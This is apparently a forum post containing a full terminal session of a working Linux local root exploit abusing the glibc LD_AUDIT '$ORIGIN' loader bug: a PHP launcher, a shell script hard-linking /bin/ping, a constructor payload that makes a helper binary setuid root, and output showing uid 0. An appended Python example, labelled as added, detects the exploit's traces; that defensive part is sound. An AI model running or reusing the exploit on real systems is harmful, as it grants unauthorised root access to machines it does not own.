20.10.2010, 17:41   #2
SynQ
 
Registered: 11.07.2010
Posts: 953
Reputation: 352

As a quick test:
Code:
[synq@localhost test]$ ls -la
total 28
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
[synq@localhost test]$ gcc exec2.c -o exec2
[synq@localhost test]$ ls -la
total 36
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rwxrwxr-x  1 synq synq 7001 Oct 20 09:38 exec2
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
[synq@localhost test]$ id
uid=500(synq) gid=500(synq) groups=500(synq)
[synq@localhost test]$ cat 1.php 
<? system("/bin/bash ./auto.sh");?>
[synq@localhost test]$ cat auto.sh 
#!/bin/sh
mkdir ./exploit
ln /bin/ping ./exploit/target
exec 3< ./exploit/target
ls -l /proc/$$/fd/3
rm -rf ./exploit/
ls -l /proc/$$/fd/3
gcc -w -fPIC -shared -o exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[synq@localhost test]$ cat exec2.c 
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
[synq@localhost test]$ cat payload.c 
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/chown root.root ./exec2; /bin/chmod 4755 ./exec2;");
}
[synq@localhost test]$ php 1.php 
lr-x------ 1 synq synq 64 Oct 20 09:38 /proc/4106/fd/3 -> /home/synq/test/exploit/target
lr-x------ 1 synq synq 64 Oct 20 09:38 /proc/4106/fd/3 -> /home/synq/test/exploit/target (deleted)
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[synq@localhost test]$ ls -la
total 44
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rwsr-xr-x  1 root  root  7001 Oct 20 09:38 exec2
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rwxrwxr-x  1 synq synq 6052 Oct 20 09:38 exploit
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
[synq@localhost test]$ id
uid=500(synq) gid=500(synq) groups=500(synq)
[synq@localhost test]$ ./exec2 id
uid=0(root) gid=0(root) groups=500(synq)
[synq@localhost test]$ uname -an
Linux localhost.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 00:57:09 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
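The transcript above leaves two observable traces: a set-user-ID process started through a deleted `/proc/<pid>/fd` link with `LD_AUDIT="$ORIGIN"` in its environment, and afterwards a root-owned setuid file (`exec2`) sitting in a directory owned by an unprivileged user. The following is an added detection example written for this page; it is not the poster's code. It parses `ls -la` listings (the final listing is copied from the transcript, the system-directory listing is constructed) and inspects constructed `/proc`-style process records with hypothetical pids; on a live host the same fields would come from `/proc/<pid>/exe` and `/proc/<pid>/environ`. The loader bug itself is only removed by updating glibc; these checks help spot the artefacts of an attempt.

```python
"""Detection helpers for the pattern in the transcript above: a setuid
binary executed via a deleted /proc/<pid>/fd link with LD_AUDIT="$ORIGIN",
leaving a root-owned setuid file in a user-owned directory.

Added example, not the poster's code. Process records and the second
listing are constructed; pids are hypothetical.
"""
import re
from dataclasses import dataclass, field

# Loader variables in which ld.so expands $ORIGIN (the expansion the
# glibc bug allowed even for set-user-ID programs).
LOADER_VARS = ("LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH")


@dataclass
class Proc:
    """Minimal /proc-style view of one process (constructed in tests)."""
    pid: int
    exe: str                       # what readlink /proc/<pid>/exe returns
    uid: int
    euid: int
    environ: dict = field(default_factory=dict)


def proc_findings(p):
    """Reasons a process matches the exploit pattern (empty list = clean)."""
    reasons = []
    for var in LOADER_VARS:
        val = p.environ.get(var, "")
        if "$ORIGIN" in val or "${ORIGIN}" in val:
            reasons.append(f"{var} contains $ORIGIN: {val!r}")
        elif val and p.euid != p.uid:
            # ld.so is supposed to ignore these for set-user-ID programs;
            # seeing them on such a process is worth a look regardless.
            reasons.append(f"{var} set on a set-user-ID process: {val!r}")
    if p.exe.endswith(" (deleted)") and p.euid == 0 and p.uid != 0:
        reasons.append(f"euid 0 process runs from deleted path {p.exe!r}")
    return reasons


# One `ls -la` line: mode, links, owner, group, size, month, day, time/year, name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+"
    r"\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+)$"
)


def parse_ls(ls_output):
    """Return (mode, owner, name) for each entry; 'total' lines are skipped."""
    out = []
    for line in ls_output.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            out.append((m.group("mode"), m.group("owner"), m.group("name")))
    return out


def suspicious_setuid(ls_output):
    """Root-owned setuid files in a directory whose '.' entry is not root-owned.

    A setuid-root binary inside a user's own directory is the artefact the
    payload leaves behind (chown root + chmod 4755 on exec2)."""
    entries = parse_ls(ls_output)
    dir_owner = next((o for _, o, n in entries if n == "."), "root")
    if dir_owner == "root":
        return []
    return [n for mode, o, n in entries
            if mode[0] == "-" and mode[3] in "sS" and o == "root"]


# Listing copied from the transcript after the exploit ran.
LS_AFTER = """\
total 44
drwxr-xr-x  2 synq synq 4096 Oct 20 09:38 .
drwx------ 17 synq synq 4096 Oct 20 09:20 ..
-rw-rw-r--  1 synq synq   36 Oct 20 09:35 1.php
-rwxrwxr-x  1 synq synq  222 Oct 20 09:32 auto.sh
-rwsr-xr-x  1 root  root  7001 Oct 20 09:38 exec2
-rw-r--r--  1 synq synq  139 Oct 20 09:25 exec2.c
-rwxrwxr-x  1 synq synq 6052 Oct 20 09:38 exploit
-rw-r--r--  1 synq synq  122 Oct 20 09:27 payload.c
"""

# Constructed listing of a root-owned system directory: setuid there is normal.
LS_SYSTEM = """\
total 8
drwxr-xr-x  2 root root 4096 Oct 20 09:00 .
drwxr-xr-x 14 root root 4096 Oct 20 09:00 ..
-rwsr-xr-x  1 root root 42000 Oct 20 09:00 ping
"""

# Constructed process records mirroring the transcript (pids hypothetical).
SAMPLE_PROCS = [
    Proc(4106, "/home/synq/test/exploit/target (deleted)", 500, 0,
         {"LD_AUDIT": "$ORIGIN"}),
    Proc(4200, "/bin/ping", 500, 0, {}),
    Proc(4201, "/usr/bin/vim", 500, 500, {"LD_PRELOAD": "/usr/lib/libfoo.so"}),
]

if __name__ == "__main__":
    for name in suspicious_setuid(LS_AFTER):
        print("setuid-root file in user-owned directory:", name)
    for p in SAMPLE_PROCS:
        for r in proc_findings(p):
            print(f"pid {p.pid}: {r}")
```

The directory-owner heuristic keeps normal setuid binaries in root-owned system directories out of the report, while the process check fires on either the `$ORIGIN` marker or the combination of a deleted executable path with an effective uid of 0 that the transcript's `/proc/4106/fd/3 -> ... (deleted)` line shows.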